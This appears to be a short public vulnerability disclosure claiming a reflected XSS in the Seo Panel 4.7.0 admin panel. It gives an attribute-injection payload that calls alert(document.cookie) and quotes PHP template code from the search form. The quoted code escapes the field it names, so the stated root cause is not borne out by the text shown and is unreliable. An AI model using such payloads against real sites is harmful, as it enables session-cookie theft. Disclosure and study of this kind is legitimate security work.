# Exploit Title: Seo Panel 4.7.0 Reflected XSS # Exploit Author: Arzu DEMREZ # Date: 05.03-2024 # Vendor Homepage: https://www.seopanel.org/ # Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.7.0 # Version: Seo Panel 4.7.0 -Description: A cross-site scripting (XSS) issue in the SEO admin login panel version 4.7.0 allows remote attackers to inject JavaScript. - used: x" onmouseover=alert(document.cookie) x=" Review Of Analysis: n archive.ctp.php file include search_form and search_name input load on that script at line 71 as <a href="javascript:void(0);" onclick="scriptDoLoadPost('archive.php', 'search_form', 'content')" class="actionbut"><?php echo $spText['button']['Search']?></a> because of that an attacker if send that code x" onmouseover=alert(document.cookie) x=" can exploit the victim. <form id='search_form'> <table width="100%" class="search"> <tr> <th><?php echo $spText['common']['Name']?>: </th> <td> <input type="text" name="search_name" value="<?php echo htmlentities($searchInfo['search_name'], ENT_QUOTES)?>" onblur="<?php echo $submitLink?>"> </td> <th><?php echo $spText['common']['Period']?>:</th> <td colspan="2"> <input type="text" value="<?php echo $fromTime?>" name="from_time" id="from_time_summary"/> <input type="text" value="<?php echo $toTime?>" name="to_time" id="to_time_summary"/> <script> $( function() { $( "#from_time_summary, #to_time_summary").datepicker({dateFormat: "yy-mm-dd"}); } ); </script> </td> <tr> <tr> <th><?php echo $spText['common']['Website']?>: </th> <td> <select name="website_id" id="website_id" onchange="scriptDoLoadPost('archive.php', 'search_form', 'content')" style="width: 180px;"> <option value="">-- <?php echo $spText['common']['Select']?> --</option> <?php foreach($siteList as $websiteInfo){?> <?php if($websiteInfo['id'] == $websiteId){?> <option value="<?php echo $websiteInfo['id']?>" selected><?php echo $websiteInfo['name']?></option> <?php }else{?> <option value="<?php echo $websiteInfo['id']?>"><?php echo $websiteInfo['name']?></option> <?php }?> <?php }?> </select> </td> <th><?php echo $spText['label']['Report Type']?>: </th> <td> <select name="report_type" id="report_type" onchange="scriptDoLoadPost('archive.php', 'search_form', 'content')" style="width: 210px;"> <option value="">-- <?php echo $spText['common']['Select']?> --</option> <?php foreach($reportTypes as $type => $info){?> <?php if($type == $searchInfo['report_type']){?> <option value="<?php echo $type?>" selected><?php echo $info?></option> <?php }else{?> <option value="<?php echo $type?>"><?php echo $info?></option> <?php }?> <?php }?> </select> <a href="javascript:void(0);" onclick="scriptDoLoadPost('archive.php', 'search_form', 'content')" class="actionbut"><?php echo $spText['button']['Search']?></a> Sayglarmla / Best Regards, [cid:e33e203c-58cd-46ba-b1ea-f27e999dc68d]
{{ x.nick }}
| Date:{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1 {{ x.comment }} |